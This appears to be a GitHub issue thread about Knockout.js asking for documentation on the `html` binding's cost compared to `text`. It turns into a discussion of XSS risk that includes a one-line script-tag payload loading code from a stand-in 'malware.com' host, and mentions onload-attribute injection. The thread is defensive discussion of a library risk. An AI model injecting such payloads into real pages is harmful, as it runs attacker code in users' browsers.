### ISSUE TITLE
Note in the docs the performance difference between text and html bindings

### ISSUE THREAD

**Issue by cervengoc** [knockout/knockout#2189]
It seems quite obvious, I still ran into the problem of incidentally overusing the `html` binding, even when it's sure that the content will be pure text.

It would be great to add a note to the `html` binding documentation, which warns the developers to use it carefully as it can add a significant performance overhead compared to the `text` binding.

**Comment by brianmhunt** [comment]
Good note.

The `html` binding also should note that it's a security risk, since it'd be trivial to inject `{{{ obs }}}`  with `obs("<script src='malware.com/nasty.js'></script>")`.  (Notwithstanding a sensible content-security policy).

**Comment by mbest** [comment]
I'm pretty sure the method Knockout uses to inject Html doesn't cause scripts to run.

**Comment by cervengoc** [comment]
Yes it should be safe think. But either way possible security issues are mentioned in the docs.

**Comment by brianmhunt** [comment]
Knockout will load external scripts via `{{{ html }}}`  if you use jQuery.  

Have a look at the console at: https://jsfiddle.net/emxem74t/1/ -- it's loading the external script https://cdnjs.cloudflare.com/ajax/libs/alt/0.18.6/alt.min.js.

**Comment by mbest** [comment]
Is that a bug or a feature? Is it possible to use jQuery and not load scripts?

**Comment by brianmhunt** [comment]
XSS vulnerabilities derive from features.

jQuery seems vulnerable in the trivial case, but it's probably pretty straightforward to make the `ko.utils.setHtml` function insert a script too.

One could sanitize the HTML, but that's [much more difficult](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) to do correctly than one would think.

One of the best options nowadays is a Content Security Policy, and SRI hashing (especially when  `require-sri-for` is supported).

Short of that, `{{{ html }}}` is dangerous.

**Comment by jrsearles** [comment]
You can use [jQuery.parseHTML](https://api.jquery.com/jquery.parsehtml/) to first parse the HTML before injecting - this by default will strip out script tags (though has an option to keep them). That wouldn't prevent inline script injection though.

**Comment by cervengoc** [comment]
@brianmhunt Yes your're right, sorry, I wasn't on top late night here. Of course `jQuery`'s `html` method will load scripts, I think it's intentianal, and if I remember correctly it's even documented. 

But after all it's definitely documented in the `html` binding documentation, so could we please focus on the note I mentioned initially? :)

**Comment by brianmhunt** [comment]
Just one more aside on XSS jQuery.parseHTML only removes the script tag; that is one of dozens of vectors from raw HTML.

**Comment by IanYates** [comment]
@brianmhunt makes a good point - wiring up event handlers via an attribute like onload is a great way to inject JavaScript.
Just so I understand, is it the case that the html binding is really slow compared to the text binding, or is it the other way around?

**Comment by cervengoc** [comment]
@IanYates Yes, of course the `html` binding is the significantly slower, as it has to do a lot of business under the hood, even when the content is just pure text.

**Comment by IanYates** [comment]
Thought so - I just read it all backwards when first looking at this issue.  I think it's because I rarely reach for the `html` binding so wasn't sure why it was being "overused".  Thanks :)

**Comment by cervengoc** [comment]
"Overusing" might not be the best term. I just ment that there might be times when one needs to consider using one of the other, and this performance note is definitely an important factor, especially if one has a few `html` binding inside `foreach` for example.
